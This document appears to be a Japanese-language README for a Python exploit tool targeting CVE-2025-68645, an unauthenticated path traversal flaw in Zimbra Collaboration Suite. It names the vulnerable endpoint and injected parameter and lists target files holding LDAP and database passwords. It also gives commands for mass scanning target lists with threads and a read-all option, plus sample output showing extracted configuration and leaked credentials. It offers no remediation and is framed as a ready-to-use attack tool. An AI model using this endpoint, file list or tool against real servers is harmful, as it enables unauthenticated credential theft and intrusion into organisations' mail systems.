
Zimbra Path Traversal (CVE-2025-68645) - Zimbra Collaboration Suite における未認証のファイル読み取り脆弱性
CVE-2025-68645 は、Zimbra Collaboration Suite におけるパストラバーサル脆弱性で、認証されていない攻撃者がサーバーのファイルシステムから任意のファイルを読み取ることを可能にします。
/h/printconversations?javax.servlet.include.servlet_path=
| 影響 | 深刻度 |
|---|---|
| 認証なしのファイル読み取り | 🔴 高 |
| 設定情報の開示 | 🔴 高 |
| 認証情報の漏えい | 🔴 高 |
| 内部ネットワークのマッピング | 🟠 中 |
| パス | 公開される情報 |
|---|---|
/WEB-INF/web.xml | サーブレットマッピング、セキュリティ制約 |
/WEB-INF/zcs.web.xml | Zimbra固有の設定 |
/opt/zimbra/conf/localconfig.xml | LDAP認証情報、データベースパスワード |
/opt/zimbra/conf/ldap-config.xml | LDAPサーバー設定 |
/opt/zimbra/conf/attrs/zimbra-attrs.xml | システム属性 |
/WEB-INF/classes/logging.properties | ロギング設定 |
python CVE-2025-68645.py.py -t https://target.zimbra.com
python CVE-2025-68645.py.py -l targets.txt -o results.json --threads 20
python CVE-2025-68645.py.py -t https://target.zimbra.com -v --timeout 30
Argument Description Default -t, --target 単一ターゲットのURL None -l, --list ターゲット一覧を含むファイル None -o, --output 出力ファイル名 results.json --threads 同時実行スレッド数 10 --timeout リクエストタイムアウト(秒) 15 -v, --verbose 詳細出力を有効化 False --no-verify SSL検証を無効化 False --read-all すべての機密パスを読み取る False
[*] Scanning: https://target.zimbra.local [✓] VULNERABLE: https://target.zimbra.local [+] Extracted configuration: version: 220726130125 memcached: target.local:11211 httpsPort: 8443 httpPort: 8080 [+] Found: /WEB-INF/web.xml [+] Found: /opt/zimbra/conf/localconfig.xml [!] Possible credentials leaked in /WEB-INF/web.xml
============================================================ SCAN COMPLETE! Time elapsed: 1.02 seconds Total targets: 1 Vulnerable: 1 Not vulnerable: 0